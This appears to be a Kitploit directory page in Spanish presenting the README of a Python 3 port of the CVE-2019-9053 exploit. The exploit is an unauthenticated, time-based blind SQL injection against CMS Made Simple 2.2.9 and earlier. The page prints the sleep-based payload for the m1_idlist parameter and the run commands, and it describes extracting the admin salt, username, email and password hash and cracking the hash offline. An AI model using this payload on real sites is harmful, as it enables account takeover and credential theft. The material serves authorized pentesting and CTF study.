Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2019-9053-py3 — Exploit de inyección SQL ciega basada en tiempo sin autenticación para CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), portado a Python 3. | Kitploit
Herramientas/GitHubGitHub/vedantrana73/cve-2019-9053-py3
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubvedantrana73/cve-2019-9053-py3

cve-2019-9053-py3

Exploit de inyección SQL ciega basada en tiempo sin autenticación para CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), portado a Python 3.

Ver Repositorio
hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-9053 — Exploit de inyección SQLi en CMS Made Simple (Python 3)

Python CVE Type Target License

Aviso legal: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y fines educativos. Ejecutarla contra sistemas sin permiso expreso por escrito es ilegal. El autor no asume ninguna responsabilidad por su uso indebido.


Resumen

Esta es una adaptación a Python 3 del exploit público para CVE-2019-9053: una vulnerabilidad de inyección SQL ciega basada en tiempo sin autenticación en CMS Made Simple ≤ 2.2.9.

El parámetro vulnerable es m1_idlist en el endpoint /moduleinterface.php (módulo News). La entrada del usuario se pasa sin sanitizar a una consulta SQL, lo que permite a un atacante no autenticado extraer el salt del administrador, el nombre de usuario, el correo electrónico y el hash de la contraseña, y opcionalmente crackear la contraseña fuera de línea.

Exploit original de Daniele Scanu @ Certimeter Group.
Adaptación a Python 3 con correcciones y limpieza.


Cómo funciona

El exploit utiliza un oráculo de tiempo: inyecta SELECT sleep(T) en una condición SQL LIKE y mide el tiempo de respuesta HTTP. Si el servidor se detiene ≥ T segundos, la condición inyectada era verdadera. Esto permite extraer datos carácter a carácter sin que ningún dato aparezca en el cuerpo de la respuesta HTTP.

root@kitploit:~
Estructura del payload:
  m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users
            +where+password+like+0x{hex(known_prefix+guess)}25
            +and+user_id+like+0x31)+--+

Orden de extracción:

Tras la extracción, el opcional ataque de diccionario fuera de línea calcula MD5(salt + word) contra una lista de palabras; no se necesitan más peticiones de red.


Cambios para Python 3

El script original estaba escrito para Python 2. Se corrigieron los siguientes cambios incompatibles:


Requisitos

root@kitploit:~
pip3 install requests termcolor
DependenciaPropósito
requestsPeticiones HTTP al objetivo
termcolorSalida de terminal en color

Uso

root@kitploit:~
# Extracción básica (sin crackeo de contraseña)
python3 exploit.py -u http://<target-ip>/simple

# Extracción + crackeo de contraseña fuera de línea
python3 exploit.py -u http://<target-ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

Opciones

FlagDescripción
-u,

Ejemplo de salida

root@kitploit:~
[+] Salt for password found: 1234abcd
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: a1b2c3d4e5f6...
[+] Password cracked: password123

Detalles del CVE


Referencias

  • NVD — CVE-2019-9053
  • Exploit original — Exploit-DB #46635
  • CMS Made Simple

Legal

Este exploit se proporciona únicamente para pruebas de penetración autorizadas y uso educativo/CTF.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso expreso por escrito es un delito penal según la IT Act, 2000 (India) y leyes equivalentes en todo el mundo.

Descargar herramienta
PasoCampoTablaNotas
1Saltcms_siteprefsNecesario para crackear la contraseña
2Usuariocms_usersuser_id = 1 (admin)
3Correocms_usersuser_id = 1 (admin)
4Contraseñacms_usersAlmacenada como MD5(salt + contraseña)
#CambioMotivo
1print "..." → print("...")print es una función en Python 3
2hashlib.md5(str(salt) + line) → hashlib.md5((salt + line).encode())hashlib.md5() requiere bytes en Python 3
3dict = open(wordlist) → with open(wordlist) as wordlist_filedict eclipsa un built-in; se cambió a un administrador de contexto
4print "\033c" → print("\033c", end="")Evita un doble salto de línea al limpiar la terminal
5print colored(...) → print(colored(...))colored() devuelve una cadena; necesita envolverse con print()
--url
URL base de la instalación de CMS Made Simple
-w, --wordlistRuta a una lista de palabras para el crackeo fuera de línea
-c, --crackHabilita el modo de crackeo de contraseñas
CampoValor
ID del CVECVE-2019-9053
Puntuación CVSS7.5 (Alta)
TipoInyección SQL ciega basada en tiempo sin autenticación
AfectaCMS Made Simple ≤ 2.2.9
Parámetrom1_idlist en el módulo News
Autenticación necesariaNinguna
ParcheCMS Made Simple 2.2.10+